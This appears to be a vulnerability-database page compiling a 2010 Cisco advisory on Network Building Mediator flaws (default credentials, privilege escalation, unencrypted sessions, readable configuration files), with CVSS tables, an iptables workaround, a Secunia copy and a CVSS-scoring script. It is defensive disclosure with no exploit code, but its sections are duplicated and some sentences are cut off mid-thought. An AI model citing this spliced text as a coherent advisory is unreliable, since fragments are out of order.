their regular update channels. For most customers, this means that
upgrades should be obtained through the Software Center on Cisco's
worldwide website at http://www.cisco.com
Customers using Third Party Support Organizations
+------------------------------------------------
Customers whose Cisco products are provided or maintained through
prior or existing agreements with third-party support organizations,
such as Cisco Partners, authorized resellers, or service providers
should contact that support organization for guidance and assistance
with the appropriate course of action in regards to this advisory.
The effectiveness of any workaround or fix is dependent on specific
customer situations, such as product mix, network topology, traffic
behavior, and organizational mission. Due to the variety of affected
products and releases, customers should consult with their service
provider or support organization to ensure any applied workaround or
fix is the most appropriate for use in the intended network before it
is deployed.
Customers without Service Contracts
+----------------------------------
Customers who purchase direct from Cisco but do not hold a Cisco
service contract, and customers who purchase through third-party
vendors but are unsuccessful in obtaining fixed software through
their point of sale should acquire upgrades by contacting the Cisco
Technical Assistance Center (TAC). TAC contacts are as follows.
* +1 800 553 2447 (toll free from within North America)
* +1 408 526 7209 (toll call from anywhere in the world)
* e-mail: tac@cisco.com
Customers should have their product serial number available and be
prepared to give the URL of this notice as evidence of entitlement to
a free upgrade. Free upgrades for non-contract customers must be
requested through the TAC.
Refer to http://www.cisco.com/en/US/support/tsd_cisco_worldwide_contacts.html
for additional TAC contact information, including localized telephone
numbers, and instructions and e-mail addresses for use in various
languages.
Exploitation and Public Announcements
=====================================
The Cisco PSIRT is not aware of any public announcements or malicious
use of the vulnerabilities described in this advisory.
These vulnerabilities were discovered during internal testing.
Status of this Notice: FINAL
============================
THIS DOCUMENT IS PROVIDED ON AN "AS IS" BASIS AND DOES NOT IMPLY ANY
KIND OF GUARANTEE OR WARRANTY, INCLUDING THE WARRANTIES OF
MERCHANTABILITY OR FITNESS FOR A PARTICULAR USE. YOUR USE OF THE
INFORMATION ON THE DOCUMENT OR MATERIALS LINKED FROM THE DOCUMENT IS
AT YOUR OWN RISK. CISCO RESERVES THE RIGHT TO CHANGE OR UPDATE THIS
DOCUMENT AT ANY TIME.
A stand-alone copy or paraphrase of the text of this document that
omits the distribution URL in the following section is an
uncontrolled copy, and may lack important information or contain
factual errors.
Distribution
============
This advisory is posted on Cisco's worldwide website at :
http://www.cisco.com/warp/public/707/cisco-sa-20100526-mediator.shtml
In addition to worldwide web posting, a text version of this notice
is clear-signed with the Cisco PSIRT PGP key and is posted to the
following e-mail and Usenet news recipients.
* cust-security-announce@cisco.com
* first-bulletins@lists.first.org
* bugtraq@securityfocus.com
* vulnwatch@vulnwatch.org
* cisco@spot.colorado.edu
* cisco-nsp@puck.nether.net
* full-disclosure@lists.grok.org.uk
* comp.dcom.sys.cisco@newsgate.cisco.com
Future updates of this advisory, if any, will be placed on Cisco's
worldwide website, but may or may not be actively announced on
mailing lists or newsgroups. Users concerned about this problem are
encouraged to check the above URL for any updates.
Revision History
================
+--------------+-------------+-------------------------+
| Revision 1.0 | 2010-May-26 | Initial public release. |
+--------------+-------------+-------------------------+
Cisco Security Procedures
=========================
Complete information on reporting security vulnerabilities in Cisco
products, obtaining assistance with security incidents, and
registering to receive security information from Cisco, is available
on Cisco's worldwide website at
http://www.cisco.com/en/US/products/products_security_vulnerability_policy.html
This includes instructions for press inquiries regarding Cisco
security notices. All Cisco security advisories are available at
http://www.cisco.com/go/psirt
VAR-201005-0905 | CVE-2010-0595 | Cisco Network Building Mediator products contain multiple vulnerabilities |
CVSS V2: 10.0 CVSS V3: - Severity: HIGH |
Cisco Mediator Framework 1.5.1 before 1.5.1.build.14-eng, 2.2 before 2.2.1.dev.1, and 3.0 before 3.0.9.release.1 on the Cisco Network Building Mediator NBM-2400 and NBM-4800 and the Richards-Zeta Mediator 2500 has a default password for the administrative user account and unspecified other accounts, which makes it easier for remote attackers to obtain privileged access, aka Bug ID CSCtb83495. Cisco Network Building Mediator (NBM) products are affected by multiple vulnerabilities that could allow an attacker to gain control of a vulnerable device or to cause a denial of service. This issue is tracked as Bug ID CSCtb83495. Access rights may be obtained by a third party. The Cisco Network Building Mediator is a smart, interconnected building solution that intelligently interconnects and operates heating, ventilation and cooling systems (HVAC), lighting, power, security, and renewable energy systems over IP networks. The Cisco Network Building Mediator has several security vulnerabilities, as follows:
- Default authentication credentials (CVE-2010-0595): multiple predefined users on the device, including the administrator account, use default credentials, so any user with network access to the device can log in to the control system as an administrator.
- Privilege escalation (CVE-2010-0596, CVE-2010-0597): these vulnerabilities allow an authenticated user who has neither administrator privileges nor knowledge of the administrator credentials to read and modify the device configuration. Both vulnerabilities are exploited over the HTTP or HTTPS transport protocol. In addition, the Cisco bug ID CSCtb83618 (CVE-2010-0597) vulnerability can be used to place a heavy load on the device; continuous exploitation can lead to a denial of service.
- Unauthorized information interception (CVE-2010-0598, CVE-2010-0599): sessions between the operator workstation and the Cisco Network Building Mediator are not protected against unauthorized interception. A malicious user could intercept sessions, obtain any authentication credentials used in them, and use those credentials to control the device. CVE-2010-0598 allows a malicious user to intercept HTTP sessions to obtain administrator authentication credentials; CVE-2010-0599 allows the same over XML RPC sessions.
- Unauthorized information access (CVE-2010-0600): a malicious user can read the system configuration files, which contain user account information including passwords. The attack reads the configuration files via XML RPC or XML RPC over HTTPS.
An attacker can exploit this issue to gain unauthorized administrative access to the affected device. Successful exploits will result in the complete compromise of the affected device. Remote attackers can easily gain access. These vulnerabilities also affect the legacy
Richards-Zeta Mediator products. This security advisory outlines
details of the following vulnerabilities:
* Default credentials
* Privilege escalation
* Unauthorized information interception
* Unauthorized information access
Cisco has released free software updates that address these
vulnerabilities. Workarounds that mitigate some of the listed
vulnerabilities are available. All Mediator Framework software releases prior to 3.1.1 are
affected by all vulnerabilities listed in this security advisory.
This table provides information about affected software releases:
+---------------------------------------+
| Cisco Bug | Affects Software |
| ID | Releases |
|-------------+-------------------------|
| CSCtb83495 | 1.5.1, 2.2, 3.0.8 |
|-------------+-------------------------|
| CSCtb83607 | 2.2, 3.0.8 |
|-------------+-------------------------|
| CSCtb83618 | 1.5.1, 2.2, 3.0.8 |
|-------------+-------------------------|
| CSCtb83631 | 1.5.1, 2.2, 3.0.8 |
|-------------+-------------------------|
| CSCtb83505 | 1.5.1, 2.2, 3.0.8 |
|-------------+-------------------------|
| CSCtb83512 | 1.5.1, 2.2, 3.0.8 |
+---------------------------------------+
Vulnerable Products
+------------------
Users can determine the version of the Mediator Framework running on
a device by logging into the device. After a successful login, the
device will display the version of Mediator Framework running on the
device. This ability
enables the Cisco Network Building Mediator to perform any-to-any
protocol translation and to provide information to the end user in a
uniform presentation. These vulnerabilities are independent of each other.
Default credentials
+------------------
Default credentials are assigned for several predefined user accounts
on the device including the administrative user account.
* CSCtb83495 (registered customers only) has been assigned the CVE
identifier CVE-2010-0595.
* CSCtb83607 (registered customers only) has been assigned the CVE
identifier CVE-2010-0596.
This vulnerability could enable any user to read and modify
device configuration.
* CSCtb83618 (registered customers only) has been assigned the CVE
identifier CVE-2010-0597. A malicious user
able to intercept the sessions could learn any credentials used
during intercepted sessions (for administrators and
non-administrators alike) and could subsequently take full control of
the device.
* CSCtb83631 (registered customers only) has been assigned CVE
identifier CVE-2010-0598.
* CSCtb83505 (registered customers only) has been assigned CVE
identifier CVE-2010-0599.
* CSCtb83512 (registered customers only) has been assigned CVE
identifier CVE-2010-0600.
Vulnerability Scoring Details
=============================
Cisco has provided scores for the vulnerabilities in this advisory
based on the Common Vulnerability Scoring System (CVSS). The CVSS
scoring in this security advisory is done in accordance with CVSS
version 2.0.
CVSS is a standards-based scoring method that conveys vulnerability
severity and helps determine urgency and priority of response.
Cisco has provided a base and temporal score. Customers can then
compute environmental scores to assist in determining the impact of
the vulnerability in individual networks.
Cisco has provided an FAQ to answer additional questions regarding
CVSS at
http://www.cisco.com/web/about/security/intelligence/cvss-qandas.html
Cisco has also provided a CVSS calculator to help compute the
environmental impact for individual networks at
http://intellishield.cisco.com/security/alertmanager/cvss
CSCtb83495 - Default credentials present on the system
CVSS Base Score - 10
Access Vector Network
Access Complexity Low
Authentication None
Confidentiality Impact Complete
Integrity Impact Complete
Availability Impact Complete
CVSS Temporal Score - 8.3
Exploitability Functional
Remediation Level Official Fix
Report Confidence Confirmed
CSCtb83607 - Privilege escalation possible over HTTP protocol
CVSS Base Score - 9
Access Vector Network
Access Complexity Low
Authentication Single
Confidentiality Impact Complete
Integrity Impact Complete
Availability Impact Complete
CVSS Temporal Score - 7.4
Exploitability Functional
Remediation Level Official Fix
Report Confidence Confirmed
CSCtb83618 - Privilege escalation possible over XML RPC protocol
CVSS Base Score - 9
Access Vector Network
Access Complexity Low
Authentication Single
Confidentiality Impact Complete
Integrity Impact Complete
Availability Impact Complete
CVSS Temporal Score - 7.4
Exploitability Functional
Remediation Level Official Fix
Report Confidence Confirmed
CSCtb83631 - Possible intercept of unencrypted HTTP sessions
CVSS Base Score - 9.3
Access Vector Network
Access Complexity Medium
Authentication None
Confidentiality Impact Complete
Integrity Impact Complete
Availability Impact Complete
CVSS Temporal Score - 7.7
Exploitability Functional
Remediation Level Official Fix
Report Confidence Confirmed
CSCtb83505 - Possible intercept of unencrypted XML RPC sessions
CVSS Base Score - 9.3
Access Vector Network
Access Complexity Medium
Authentication None
Confidentiality Impact Complete
Integrity Impact Complete
Availability Impact Complete
CVSS Temporal Score - 7.7
Exploitability Functional
Remediation Level Official Fix
Report Confidence Confirmed
CSCtb83512 - Access to sensitive information over XML RPC
CVSS Base Score - 10
Access Vector Network
Access Complexity Low
Authentication None
Confidentiality Impact Complete
Integrity Impact Complete
Availability Impact Complete
CVSS Temporal Score - 8.3
Exploitability Functional
Remediation Level Official Fix
Report Confidence Confirmed
Impact
======
Successful exploitation of any of these vulnerabilities could result
in a malicious user taking complete control over an affected device.
Software Versions and Fixes
===========================
When considering software upgrades, also consult
http://www.cisco.com/go/psirt and any subsequent advisories to
determine exposure and a complete upgrade solution.
In all cases, customers should exercise caution to be certain the
devices to be upgraded contain sufficient memory and that current
hardware and software configurations will continue to be supported
properly by the new release. If the information is not clear, contact
the Cisco Technical Assistance Center (TAC) or your contracted
maintenance provider for assistance.
Each row of the software table below names a Mediator Framework
software release. If a given software release is vulnerable, then the
earliest possible releases that contain the fix (along with the
anticipated date of availability for each, if applicable) are listed
in the "First Fixed Release" column of the table. Cisco recommends
upgrading to the latest available release where possible. All
vulnerabilities are fixed in Mediator Framework release 3.1.1 and
above. Mediator Framework release 3.1.1 is the recommended migration
path for all Mediator Framework releases.
Vulnerabilities do not affect Mediator Operating Environment.
To obtain fixed 1.5.1 and 2.2 Mediator Framework software and
configTOOL version 3.1.0b1 contact Cisco TAC.
Privilege escalation
+-------------------
There are no workarounds for these vulnerabilities.
Unauthorized information interception
+------------------------------------
The following workaround is applicable only to the vulnerability
related to HTTP protocol. There is no workaround for the
vulnerability that affects the XML RPC service. The HTTPS service is enabled and running by
default and no further actions are needed to enable it. The HTTP
service can be disabled with configTOOL. Inside the Node tree pane, expand the services tab, and
then expand the network tab. Click the http_server tab, and then
click Enabled to uncheck it.
Unauthorized information access
+------------------------------
There is no workaround for this vulnerability. In
the following examples it is assumed that the operator console has IP
address 192.0.2.1. The 192.0.2.1 address must be changed to match the
IP address used by the designated operator console. The following
code must be entered on the console. Please refer to section 2.4 in
the user guide at
http://www.cisco.com/en/US/docs/security/physical_security/cnbm/User/guide/CNBM__UG.pdf
for information on how to connect to the serial port using
hyper-terminal.
# The following rule establishes a default policy for INPUT rule chain.
# The default policy is to drop all packets unless they are explicitly
# permitted by a rule in the INPUT chain
iptables -P INPUT DROP
# This rule will allow all traffic from operator console with
# IP address of 192.0.2.1 to the Cisco NBM
#
# Change 192.0.2.1 to match IP address used by your operators console.
iptables -I INPUT 1 --source 192.0.2.1 -j ACCEPT
# Repeat the previous command if you have more than one operator console.
# Increment the number after the "INPUT" keyword for each console you
# are adding.
#
# This command will allow second operator console with IP address
# of 192.0.2.2 to access the Cisco NBM
iptables -I INPUT 2 --source 192.0.2.2 -j ACCEPT
When applying rules from the above example care must be taken to
allow access to ports or protocols that are used by sensors and other
devices deployed in the system that are monitored and controlled by
the Cisco Network Building Mediator. Failure to do so will break
connectivity to these sensors and devices.
Additional mitigation techniques that can be deployed on Cisco
devices within the network are available in the Cisco Applied
Mitigation Bulletin companion document for this advisory:
http://www.cisco.com/warp/public/707/cisco-amb-20100526-mediator.shtml
Obtaining Fixed Software
========================
Cisco has released free software updates that address these
vulnerabilities. Prior to deploying software, customers should
consult their maintenance provider or check the software for feature
set compatibility and known issues specific to their environment.
Customers may only install and expect support for the feature sets
they have purchased. By installing, downloading, accessing or
otherwise using such software upgrades, customers agree to be bound
by the terms of Cisco's software license terms found at
http://www.cisco.com/en/US/docs/general/warranty/English/EU1KEN_.html,
or as otherwise set forth at Cisco.com Downloads at
http://www.cisco.com/public/sw-center/sw-usingswc.shtml
Do not contact psirt@cisco.com or security-alert@cisco.com for
software upgrades.
Customers with Service Contracts
+-------------------------------
Customers with contracts should obtain upgraded software through
their regular update channels. For most customers, this means that
upgrades should be obtained through the Software Center on Cisco's
worldwide website at http://www.cisco.com
Customers using Third Party Support Organizations
+------------------------------------------------
Customers whose Cisco products are provided or maintained through
prior or existing agreements with third-party support organizations,
such as Cisco Partners, authorized resellers, or service providers
should contact that support organization for guidance and assistance
with the appropriate course of action in regards to this advisory.
The effectiveness of any workaround or fix is dependent on specific
customer situations, such as product mix, network topology, traffic
behavior, and organizational mission. Due to the variety of affected
products and releases, customers should consult with their service
provider or support organization to ensure any applied workaround or
fix is the most appropriate for use in the intended network before it
is deployed.
Customers without Service Contracts
+----------------------------------
Customers who purchase direct from Cisco but do not hold a Cisco
service contract, and customers who purchase through third-party
vendors but are unsuccessful in obtaining fixed software through
their point of sale should acquire upgrades by contacting the Cisco
Technical Assistance Center (TAC). TAC contacts are as follows.
* +1 800 553 2447 (toll free from within North America)
* +1 408 526 7209 (toll call from anywhere in the world)
* e-mail: tac@cisco.com
Customers should have their product serial number available and be
prepared to give the URL of this notice as evidence of entitlement to
a free upgrade. Free upgrades for non-contract customers must be
requested through the TAC.
Refer to http://www.cisco.com/en/US/support/tsd_cisco_worldwide_contacts.html
for additional TAC contact information, including localized telephone
numbers, and instructions and e-mail addresses for use in various
languages.
Exploitation and Public Announcements
=====================================
The Cisco PSIRT is not aware of any public announcements or malicious
use of the vulnerabilities described in this advisory.
These vulnerabilities were discovered during internal testing.
Status of this Notice: FINAL
============================
THIS DOCUMENT IS PROVIDED ON AN "AS IS" BASIS AND DOES NOT IMPLY ANY
KIND OF GUARANTEE OR WARRANTY, INCLUDING THE WARRANTIES OF
MERCHANTABILITY OR FITNESS FOR A PARTICULAR USE. YOUR USE OF THE
INFORMATION ON THE DOCUMENT OR MATERIALS LINKED FROM THE DOCUMENT IS
AT YOUR OWN RISK. CISCO RESERVES THE RIGHT TO CHANGE OR UPDATE THIS
DOCUMENT AT ANY TIME.
A stand-alone copy or paraphrase of the text of this document that
omits the distribution URL in the following section is an
uncontrolled copy, and may lack important information or contain
factual errors.
Distribution
============
This advisory is posted on Cisco's worldwide website at:
http://www.cisco.com/warp/public/707/cisco-sa-20100526-mediator.shtml
In addition to worldwide web posting, a text version of this notice
is clear-signed with the Cisco PSIRT PGP key and is posted to the
following e-mail and Usenet news recipients.
* cust-security-announce@cisco.com
* first-bulletins@lists.first.org
* bugtraq@securityfocus.com
* vulnwatch@vulnwatch.org
* cisco@spot.colorado.edu
* cisco-nsp@puck.nether.net
* full-disclosure@lists.grok.org.uk
* comp.dcom.sys.cisco@newsgate.cisco.com
Future updates of this advisory, if any, will be placed on Cisco's
worldwide website, but may or may not be actively announced on
mailing lists or newsgroups. Users concerned about this problem are
encouraged to check the above URL for any updates.
Revision History
================
+--------------+-------------+-------------------------+
| Revision 1.0 | 2010-May-26 | Initial public release. |
+--------------+-------------+-------------------------+
Cisco Security Procedures
=========================
Complete information on reporting security vulnerabilities in Cisco
products, obtaining assistance with security incidents, and
registering to receive security information from Cisco, is available
on Cisco's worldwide website at
http://www.cisco.com/en/US/products/products_security_vulnerability_policy.html
This includes instructions for press inquiries regarding Cisco
security notices. All Cisco security advisories are available at
http://www.cisco.com/go/psirt
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.10 (Darwin)
iEYEARECAAYFAkv9S00ACgkQ86n/Gc8U/uDJRQCcCCww9H/6P7BHqAZ9k29Tq4hj
EWQAn3eEfS/iAcbfn5ERow7JQO4QmnPg
=bCsA
-----END PGP SIGNATURE-----
----------------------------------------------------------------------
Stay Compliant
Alerts, Technical Descriptions, PoC, Links to patches, CVSS, CVE, Changelogs, Alternative Remediation Strategies, and much more provided in the Secunia Vulnerability Intelligence solutions
Free Trial
http://secunia.com/products/corporate/evm/trial/
----------------------------------------------------------------------
TITLE:
Cisco Network Building Mediator Products Multiple Vulnerabilities
SECUNIA ADVISORY ID:
SA39904
VERIFY ADVISORY:
Secunia.com
http://secunia.com/advisories/39904/
Customer Area (Credentials Required)
https://ca.secunia.com/?page=viewadvisory&vuln_id=39904
RELEASE DATE:
2010-05-27
DISCUSS ADVISORY:
http://secunia.com/advisories/39904/#comments
AVAILABLE ON SITE AND IN CUSTOMER AREA:
* Last Update
* Popularity
* Comments
* Criticality Level
* Impact
* Where
* Solution Status
* Operating System / Software
* CVE Reference(s)
http://secunia.com/advisories/39904/
ONLY AVAILABLE IN CUSTOMER AREA:
* Authentication Level
* Report Reliability
* Secunia PoC
* Secunia Analysis
* Systems Affected
* Approve Distribution
* Remediation Status
* Secunia CVSS Score
* CVSS
https://ca.secunia.com/?page=viewadvisory&vuln_id=39904
ONLY AVAILABLE WITH SECUNIA CSI AND SECUNIA PSI:
* AUTOMATED SCANNING
http://secunia.com/vulnerability_scanning/personal/
http://secunia.com/vulnerability_scanning/corporate/wsus_sccm_3rd_third_party_patching/
DESCRIPTION:
Some vulnerabilities have been reported in Cisco Network Building
Mediator, which can be exploited by malicious users to gain escalated
privileges and by malicious people to gain knowledge of sensitive
information.
2) Certain sensitive information (e.g. credentials) is passed via
HTTP and XML-RPC over HTTP and may, therefore, be intercepted by a
third party.
SOLUTION:
Update to a fixed version.
Further details available in Customer Area:
http://secunia.com/products/corporate/EVM/
PROVIDED AND/OR DISCOVERED BY:
Reported by the vendor.
ORIGINAL ADVISORY:
http://www.cisco.com/warp/public/707/cisco-sa-20100526-mediator.shtml
OTHER REFERENCES:
Further details available in Customer Area:
http://secunia.com/products/corporate/EVM/
DEEP LINKS:
Further details available in Customer Area:
http://secunia.com/products/corporate/EVM/
EXTENDED DESCRIPTION:
Further details available in Customer Area:
http://secunia.com/products/corporate/EVM/
EXTENDED SOLUTION:
Further details available in Customer Area:
http://secunia.com/products/corporate/EVM/
EXPLOIT:
Further details available in Customer Area:
http://secunia.com/products/corporate/EVM/
----------------------------------------------------------------------
About:
This Advisory was delivered by Secunia as a free service to help
private users keeping their systems up to date against the latest
vulnerabilities.
Subscribe:
http://secunia.com/advisories/secunia_security_advisories/
Definitions: (Criticality, Where etc.)
http://secunia.com/advisories/about_secunia_advisories/
Please Note:
Secunia recommends that you verify all advisories you receive by
clicking the link.
Secunia NEVER sends attached files with advisories.
Secunia does not advise people to install third party patches, only
use those supplied by the vendor.
----------------------------------------------------------------------
Unsubscribe: Secunia Security Advisories
http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org
----------------------------------------------------------------------
VAR-201005-0904 | CVE-2010-0596 | Cisco Network Building Mediator products contain multiple vulnerabilities |
CVSS V2: 9.0 CVSS V3: - Severity: HIGH |
Unspecified vulnerability in Cisco Mediator Framework 2.2 before 2.2.1.dev.1 and 3.0 before 3.0.9.release.1 on the Cisco Network Building Mediator NBM-2400 and NBM-4800 and the Richards-Zeta Mediator 2500 allows remote authenticated users to read or modify the device configuration, and gain privileges, via a (1) HTTP or (2) HTTPS request, aka Bug ID CSCtb83607. The Cisco Network Building Mediator is a smart, interconnected building solution that intelligently interconnects and operates heating, ventilation and cooling systems (HVAC), lighting, power, security, and renewable energy systems over IP networks. Both vulnerabilities must be exploited over the HTTP or HTTPS transport protocol. In addition, the vulnerability tracked as Cisco bug ID CSCtb83618 (CVE-2010-0597) can be used to reload the device; repeated exploitation can lead to a denial of service. - Unauthorized information interception (CVE-2010-0598, CVE-2010-0599): The Cisco Network Building Mediator does not protect sessions between the operator workstation and the device against interception. A malicious user who intercepts a session can obtain the authentication credentials exchanged in it and use them to control the device. CVE-2010-0598 allows a malicious user who intercepts an HTTP session to obtain administrator authentication credentials; CVE-2010-0599 allows a malicious user who intercepts an XML RPC session to obtain administrator authentication credentials. - Unauthorized information access (CVE-2010-0600): A malicious user can read the system configuration files, which contain user account information, including passwords. An attacker can read the configuration files via XML RPC or XML RPC over HTTPS. This issue is tracked by Cisco Bug ID CSCtb83607.
An authenticated attacker can exploit this issue to read and modify configuration settings, gaining elevated privileges. This may lead to a full compromise of the affected computer or aid in further attacks. These vulnerabilities also affect the legacy
Richards-Zeta Mediator products. This security advisory outlines
details of the following vulnerabilities:
* Default credentials
* Privilege escalation
* Unauthorized information interception
* Unauthorized information access
Cisco has released free software updates that address these
vulnerabilities. Workarounds that mitigate some of the listed
vulnerabilities are available. After a successful login, the
device will display the version of Mediator Framework running on the
device. This ability
enables the Cisco Network Building Mediator to perform any-to-any
protocol translation and to provide information to the end user in a
uniform presentation. These vulnerabilities are independent of each other.
Default credentials
+------------------
Default credentials are assigned for several predefined user accounts
on the device including the administrative user account.
* CSCtb83495 (registered customers only) has been assigned the CVE
identifier CVE-2010-0595.
* CSCtb83607 (registered customers only) has been assigned the CVE
identifier CVE-2010-0596.
This vulnerability could enable any user to read and modify
device configuration.
* CSCtb83618 (registered customers only) has been assigned the CVE
identifier CVE-2010-0597. Additionally, this
vulnerability can be exploited to reload the affected device. A malicious user
able to intercept the sessions could learn any credentials used
during intercepted sessions (for administrators and
non-administrators alike) and could subsequently take full control of
the device.
* CSCtb83631 (registered customers only) has been assigned CVE
identifier CVE-2010-0598.
* CSCtb83505 (registered customers only) has been assigned CVE
identifier CVE-2010-0599.
* CSCtb83512 (registered customers only) has been assigned CVE
identifier CVE-2010-0600.
Vulnerability Scoring Details
=============================
Cisco has provided scores for the vulnerabilities in this advisory
based on the Common Vulnerability Scoring System (CVSS). The CVSS
scoring in this security advisory is done in accordance with CVSS
version 2.0.
CVSS is a standards-based scoring method that conveys vulnerability
severity and helps determine urgency and priority of response.
Cisco has provided a base and temporal score. Customers can then
compute environmental scores to assist in determining the impact of
the vulnerability in individual networks.
Cisco has provided an FAQ to answer additional questions regarding
CVSS at
http://www.cisco.com/web/about/security/intelligence/cvss-qandas.html
Cisco has also provided a CVSS calculator to help compute the
environmental impact for individual networks at
http://intellishield.cisco.com/security/alertmanager/cvss
CSCtb83495 - Default credentials present on the system
CVSS Base Score - 10
Access Vector Network
Access Complexity Low
Authentication None
Confidentiality Impact Complete
Integrity Impact Complete
Availability Impact Complete
CVSS Temporal Score - 8.3
Exploitability Functional
Remediation Level Official Fix
Report Confidence Confirmed
CSCtb83607 - Privilege escalation possible over HTTP protocol
CVSS Base Score - 9
Access Vector Network
Access Complexity Low
Authentication Single
Confidentiality Impact Complete
Integrity Impact Complete
Availability Impact Complete
CVSS Temporal Score - 7.4
Exploitability Functional
Remediation Level Official Fix
Report Confidence Confirmed
CSCtb83618 - Privilege escalation possible over XML RPC protocol
CVSS Base Score - 9
Access Vector Network
Access Complexity Low
Authentication Single
Confidentiality Impact Complete
Integrity Impact Complete
Availability Impact Complete
CVSS Temporal Score - 7.4
Exploitability Functional
Remediation Level Official Fix
Report Confidence Confirmed
CSCtb83631 - Possible intercept of unencrypted HTTP sessions
CVSS Base Score - 9.3
Access Vector Network
Access Complexity Medium
Authentication None
Confidentiality Impact Complete
Integrity Impact Complete
Availability Impact Complete
CVSS Temporal Score - 7.7
Exploitability Functional
Remediation Level Official Fix
Report Confidence Confirmed
CSCtb83505 - Possible intercept of unencrypted XML RPC sessions
CVSS Base Score - 9.3
Access Vector Network
Access Complexity Medium
Authentication None
Confidentiality Impact Complete
Integrity Impact Complete
Availability Impact Complete
CVSS Temporal Score - 7.7
Exploitability Functional
Remediation Level Official Fix
Report Confidence Confirmed
CSCtb83512 - Access to sensitive information over XML RPC
CVSS Base Score - 10
Access Vector Network
Access Complexity Low
Authentication None
Confidentiality Impact Complete
Integrity Impact Complete
Availability Impact Complete
CVSS Temporal Score - 8.3
Exploitability Functional
Remediation Level Official Fix
Report Confidence Confirmed
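The scoring blocks above (and the identical block earlier on this page) list each bug's CVSS v2 metrics together with the base and temporal scores Cisco derived from them. The following Python is an added worked example, not part of the Cisco advisory or of the VARIoT record: it applies the CVSS v2 base and temporal equations, using the metric weights from the CVSS v2 specification, to the metrics transcribed from the advisory and checks that the recomputed scores match the published ones. The `ADVISORY_METRICS` table and the function names are this example's own.

```python
"""CVSS v2 base and temporal scoring, checked against the Cisco Mediator advisory.

Added example. The weights below are the CVSS v2 specification's; the
ADVISORY_METRICS table transcribes the metrics published in the advisory.
Decimal arithmetic is used so that exact ties such as 8.265 round the way
the specification expects (half up) rather than by float representation.
"""
from decimal import Decimal, ROUND_HALF_UP

# Base metric weights (CVSS v2).
ACCESS_VECTOR = {"Local": Decimal("0.395"), "Adjacent Network": Decimal("0.646"), "Network": Decimal("1.0")}
ACCESS_COMPLEXITY = {"High": Decimal("0.35"), "Medium": Decimal("0.61"), "Low": Decimal("0.71")}
AUTHENTICATION = {"Multiple": Decimal("0.45"), "Single": Decimal("0.56"), "None": Decimal("0.704")}
IMPACT = {"None": Decimal("0.0"), "Partial": Decimal("0.275"), "Complete": Decimal("0.660")}

# Temporal metric weights (CVSS v2).
EXPLOITABILITY = {"Unproven": Decimal("0.85"), "Proof-of-Concept": Decimal("0.9"),
                  "Functional": Decimal("0.95"), "High": Decimal("1.0"), "Not Defined": Decimal("1.0")}
REMEDIATION_LEVEL = {"Official Fix": Decimal("0.87"), "Temporary Fix": Decimal("0.90"),
                     "Workaround": Decimal("0.95"), "Unavailable": Decimal("1.0"), "Not Defined": Decimal("1.0")}
REPORT_CONFIDENCE = {"Unconfirmed": Decimal("0.90"), "Uncorroborated": Decimal("0.95"),
                     "Confirmed": Decimal("1.0"), "Not Defined": Decimal("1.0")}


def _round1(value: Decimal) -> float:
    """Round to one decimal place, half up, as the CVSS v2 equations require."""
    return float(value.quantize(Decimal("0.1"), rounding=ROUND_HALF_UP))


def base_score(av: str, ac: str, au: str, c: str, i: str, a: str) -> float:
    """CVSS v2 base equation from the six base metrics."""
    impact = Decimal("10.41") * (1 - (1 - IMPACT[c]) * (1 - IMPACT[i]) * (1 - IMPACT[a]))
    exploitability = Decimal("20") * ACCESS_VECTOR[av] * ACCESS_COMPLEXITY[ac] * AUTHENTICATION[au]
    f_impact = Decimal("0") if impact == 0 else Decimal("1.176")
    return _round1((Decimal("0.6") * impact + Decimal("0.4") * exploitability - Decimal("1.5")) * f_impact)


def temporal_score(base: float, e: str, rl: str, rc: str) -> float:
    """CVSS v2 temporal equation: the rounded base score scaled by the three temporal weights."""
    return _round1(Decimal(str(base)) * EXPLOITABILITY[e] * REMEDIATION_LEVEL[rl] * REPORT_CONFIDENCE[rc])


# Metrics and published (base, temporal) scores as listed in the advisory.
_FULL = dict(c="Complete", i="Complete", a="Complete", e="Functional", rl="Official Fix", rc="Confirmed")
ADVISORY_METRICS = {
    "CSCtb83495": dict(av="Network", ac="Low", au="None", published=(10.0, 8.3), **_FULL),
    "CSCtb83607": dict(av="Network", ac="Low", au="Single", published=(9.0, 7.4), **_FULL),
    "CSCtb83618": dict(av="Network", ac="Low", au="Single", published=(9.0, 7.4), **_FULL),
    "CSCtb83631": dict(av="Network", ac="Medium", au="None", published=(9.3, 7.7), **_FULL),
    "CSCtb83505": dict(av="Network", ac="Medium", au="None", published=(9.3, 7.7), **_FULL),
    "CSCtb83512": dict(av="Network", ac="Low", au="None", published=(10.0, 8.3), **_FULL),
}


def check_advisory() -> dict:
    """Recompute every entry and report whether it matches the published scores."""
    results = {}
    for bug_id, m in ADVISORY_METRICS.items():
        base = base_score(m["av"], m["ac"], m["au"], m["c"], m["i"], m["a"])
        temporal = temporal_score(base, m["e"], m["rl"], m["rc"])
        results[bug_id] = {"base": base, "temporal": temporal,
                           "matches": (base, temporal) == m["published"]}
    return results


if __name__ == "__main__":
    for bug_id, r in check_advisory().items():
        status = "ok" if r["matches"] else "MISMATCH"
        print(f"{bug_id}: base {r['base']} temporal {r['temporal']} [{status}]")
```

The three distinct base vectors on the page (AV:N/AC:L/Au:N, AV:N/AC:L/Au:S and AV:N/AC:M/Au:N, all with complete C/I/A impact) reproduce 10.0, 9.0 and 9.3, and the common temporal vector (Functional, Official Fix, Confirmed) scales each of them by 0.95 x 0.87 x 1.0 to 8.3, 7.4 and 7.7. An environmental score for a particular site is a further multiplication of these figures, which is what the advisory means when it says customers can compute it themselves.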
Impact
======
Successful exploitation of any of these vulnerabilities could result
in a malicious user taking complete control over an affected device.
Software Versions and Fixes
===========================
When considering software upgrades, also consult
http://www.cisco.com/go/psirt and any subsequent advisories to
determine exposure and a complete upgrade solution.
In all cases, customers should exercise caution to be certain the
devices to be upgraded contain sufficient memory and that current
hardware and software configurations will continue to be supported
properly by the new release. If the information is not clear, contact
the Cisco Technical Assistance Center (TAC) or your contracted
maintenance provider for assistance.
Each row of the software table below names a Mediator Framework
software release. If a given software release is vulnerable, then the
earliest possible releases that contain the fix (along with the
anticipated date of availability for each, if applicable) are listed
in the "First Fixed Release" column of the table. Cisco recommends
upgrading to the latest available release where possible. All
vulnerabilities are fixed in Mediator Framework release 3.1.1 and
above. Mediator Framework release 3.1.1 is the recommended migration
path for all Mediator Framework releases.
Vulnerabilities do not affect Mediator Operating Environment.
To obtain fixed 1.5.1 and 2.2 Mediator Framework software and
configTOOL version 3.1.0b1 contact Cisco TAC.
